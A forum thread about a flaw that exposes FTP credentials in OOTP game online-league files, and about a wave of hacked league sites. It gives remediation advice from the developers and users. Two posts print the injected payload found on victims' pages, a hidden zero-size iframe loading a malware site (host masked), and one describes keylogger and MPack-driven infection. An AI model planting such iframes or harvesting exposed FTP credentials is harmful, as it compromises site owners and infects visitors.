OOTP Online League Security Problem

[Andreas Raht]

Attention, online league commissioners! A security issue has been discovered in the online league dat files. The dat files contain the league server's FTP access information and if a hacker finds the username and password he could easily access your web space and do all kind of malicious things.

We will release a patched version very soon where the FTP information contained in the dat files is encrypted. It's currently in beta testing.
However, you know that each encryption can be hacked, so we strongly suggest that you hide your league files! Only GMs should have access to the league files. There should be no (public) link to the league file anywhere on your web space. That's easy to do and it will keep away the evildoers.

The perfect solution for the league file problem would be an extra subdomain on your web space where PHP/CGI/Perl/ASP is turned OFF and which has an extra FTP account that can only access that sub domain folder.

Please, all commissioners, do the following ASAP:

--- Change the FTP password of the web site which the GMs used for the online leagues NOW (i.e. the password which has been entered in OOTP). The
password must be replaced with another one IMMEDIATELY! If you cannot do that or if you don't know how to do that, you have to ask the admin of the web server, i.e. your ISP (Internet Service Provider) who hosts your web space.

--- Move the league file to a different place on your web server where NOBODY CAN FIND IT. Only the GMs may know the address of the league file! Nobody else should be able to find it. You could just rename the league file or move it to another folder. In OOTP 2007/8/9 there is an option to set the name of the league file. Just set it to for example myLeague_ahsfkas89df.tar.gz and nobody will find it except your GMs who will get the link to the file from you.

--- Remove the link to the league file from your homepage! Many online leagues publish the link on their web page for convenience, but you should no longer do that!

--- Message board software and CMS (Content Management System like Joomla) software used for the online league web sites should be updated whenever updates are available. Hackers find new security holes in that kind of software frequently, simply because they have the source code of the software.

We apologise for any inconvenience!!

Please also have a look at these threads:

http://www.ootpdevelopments.com/boar...e-leagues.html

http://www.ootpdevelopments.com/boar...ty-notice.html

[Officespace99]

Can we get a confirmation as to whether this affects OOTP 8, since a large % of leagues are still on this version?

[Bristolduke]

The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.

[f.montoya]

I just found this in the index.html from an OOTP 6 online league I host...

Code:

<html>



<head>

<title>OOTP 6 Generated Website</title>

</head>



<frameset rows="100,*" frameborder="0" framespacing="0" border="0">

  <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">

  <frameset cols="100,*">

    <frame name="menu" target="Hauptframe" src="menu.html">

    <frame name="content" src="league.html">

  </frameset>

  <noframes>

  <body><(SPACE HERE) ****** src="http://badsitehere" style="width: 0px; height: 0px; display: none"><(SPACE HERE)  /******>





  <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht 

  unterst・zt.</p>



  </body>

  </noframes>

</frameset>



</html>

OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.

[Andreas Raht]

Quote:

Originally Posted by Bristolduke

The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.

Sorry, that must be a misunderstanding!

Quote:

Originally Posted by f.montoya

OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.

Unfortunately we cannot patch 6.5 and OOTP 2007 for several reasons. We'll not release patches for the older versions and to be honest: it would not make much sense because if we encrypted the FTP password in the dat file it could still be hacked!
In OOTP 6.5 everything was encrypted, and obviously it has been hacked, too. We could improve the encryption, but it will also be hacked sooner or later.
See, obviously somebody wrote some code to hack OOTP Online leagues. He has to find and download the league file, extract the FTP info, log in to the site and do his dirty job. Lots of work actually, and there are not as many online leagues of the web as for example vBulletin message boards or Joomla web sites, so I don't know why the evildoer does that. There is only one explanation: we have an enemy out there. He cracked the first encryption and he will also crack the next one. No, encryption is not the solution.
We have to change the whole process, and until we did that, the commisioners can do it on their own:

- hide the league files! Only your GMs may know where it is!
- use an extra FTP account for the folder to which the league files are uploaded!
- change your FTP password NOW!

We are sorry that this happened. We will improve OOTP and we will change the online league upload/download process. But the GMs can simply change the process now by hiding the league file and that will do much more than improving the encryption.

[Markus Heinsohn]

Andreas is right. Please follow his guidelines!

[kq76]

After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?

[Tony M]

Quote:

Originally Posted by kq76

After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?

Correct, because the FTP details they have in their game will be wrong.

[SMFXR01]

Am I right in assuming that version 9.2.7 should not be used and
we should wait for 9.2.9?

I am getting an error when I switch from an Online League to a Solo League.

( UTILITY_FUNCTIONS::get_decrypted_string-invalid source string )

I assume this has to do with identifing the difference between an Online League and a
Non Online League.

[Treches]

Quote:

Originally Posted by f.montoya

I just found this in the index.html from an OOTP 6 online league I host...
xxx
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.

First, remove the address of the ****** from your post. It's a malware site.
Second, while the ftp pw can certainly be obtained from the league file without much hassle, I doubt we are dealing with a cracker doing things manually here. Obviously, the ****** hack is appearing because the ftp pw is leaked, but is a program the one that is inserting them (into all those files named "index" or "main") via a trojan on the user side. And no matter what you do if the trojan isn't removed from the machine, because that sofware (MPack, most likely) cycles and runs non-stop. The trojan is sending the cracker the ftp pw; if you change it but don't erase the trojan, he gets the new pw and you get the ****** code again. He may have targeted OOTP leagues, but websites have been infected by the ****** in the thousands since 2007, from CBS to aunti Mildred's cooking forums.

Usually, it goes like this: this bot signs up on the forums (maybe several times); uses a valid email account and writes down a website address in its profile. Joe Curious notices the new guy on board and clicks to check that website. This one, of course, is a malware site, and the moment Joe Curious gets there his firewall and web brownser are checked for security loopholes, and if he has them, the trojan is d/l'ed and installed automatically. The trojan is a keylogger that sends the cracker all sorts of pw, mainly ftp's. Thus, the moment you change the pw, he gets it. The ****** gets inserted in the code and redirects your page to the malware site, thus infecting those who have security loopholes (mostly everyone whose firewall does no block the redirection).

Things to do here are:
1. Scan your machine for malware. Have in mind that the trojan may block the anti-malware, so you might want to online scan (trend micro, for example) and/or install the anti-malware (a-squared, malware bytes, etc.) on a pen drive and scan the pc from there and remove the trojan.

2. Once you have your machine cleaned, take a close look at all the files you have on your site, erasing those you don't recognize.

3. Change your main ftp pw.

4. Create a ftp user and pw with permission to access just the folder where OOTP exports are located. That's the one you have to type down within the game, not the main ftp id and pw.

5. Rename your "index" pages (at least, your frontpage) to a different name (yourleague.html, for example).

6. Authorize every new registration on your forums.

7. Get yourself a malware shield.

8. Make sure that your web brownser is not allowed to d/l anything automatically.

9. Pray that the trojan is not located on the server side, because then your best move is transferring your site to another one.

[gollum65]

You may be right about it being a trojan, but if that's the case we all have the same trojan. I know of at least 6 sites that were hacked multiple times in the last month or so, using the same method, including my own site which was hacked 4 times. Regardless of how the guy is getting the info, he's getting it and is apparently going after multiple OOTP sites.

[Treches]

It's the same type of trojan and he/they is/are going after all kind of sites because he/they is/are getting paid by the hit. The ****** not only gets inserted in the code but also erases other cracker's iframes. Mpack goes by $800, so we are not dealing with kids fooling around here.

[Chappy]

Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file:

Code:

<****** src="evil site" style="width: 0px; height: 0px; display: none"></******>

Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???

[kq76]

Quote:

Originally Posted by Chappy

Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file: <snip> Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???

Is your forum and blog software up-to-date?

Whatever it is, once correct it, you'll probably want to change the passwords and locations again.

[Treches]

Quote:

Originally Posted by Chappy

Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???

Read:

Quote:

Originally Posted by Treches

Molarmite,

I posted step-by-step instructions on Andreas' thread to fix the issue.

Read what Alan T has written down because that's exactly what's happening to you. You (or whoever has access to your site) have a keylogger trojan on your machine that's sending the ftp pw to the hacker. Until the trojan is removed it's pointless to change the pw, 'cause the moment you change it he gets it. Then a piece of software called Mpack inserts the ****** that redirects your "index" or "main" pages to a malware site. Mpack cycles and runs non-stop as long as it has the pw. Thus, you can clean up the code today but will get the ****** again next week.

[Treches]

And read:

Quote:

Originally Posted by Treches

"That said, I continue to see that the hacker is also placing iframes directly into the league reports as well. So I'm afraid that even a restricted FTP account for the game will not stop this cycle."
--
Correct. Restricted FTP accounts (say the one you place on the downloadable league file) is just to avoid the casual cracker from fooling around, but restrictions don't block Mpack, as it will gain access to the root nevertheless, bypassing the permissions. The only way to block it is erasing the trojan on the user side and then, and only then, changing the pw.

Thus, the patch does nothing if you have the trojan on board.

[Chappy]

So...

Would changing all the info and running a couple of sims from an alternate PC be agood idea?

[Treches]

If you use an alternate PC you're safe if a) It's clean, and b) Has a fresh ftp password. In any case, I'd recommend you to focus on removing the keylogger trojan from whomever has it.

[Treches]

Also, remove the ****** link from your post.

[Chappy]

Treches,

Thanks for the replies. I appreciate the help...

However, I'm convinced that their is not a keylogger trojan on my machine. I've swept it now with 3 different products (including the Trend Micro one you recommended) and found nothing.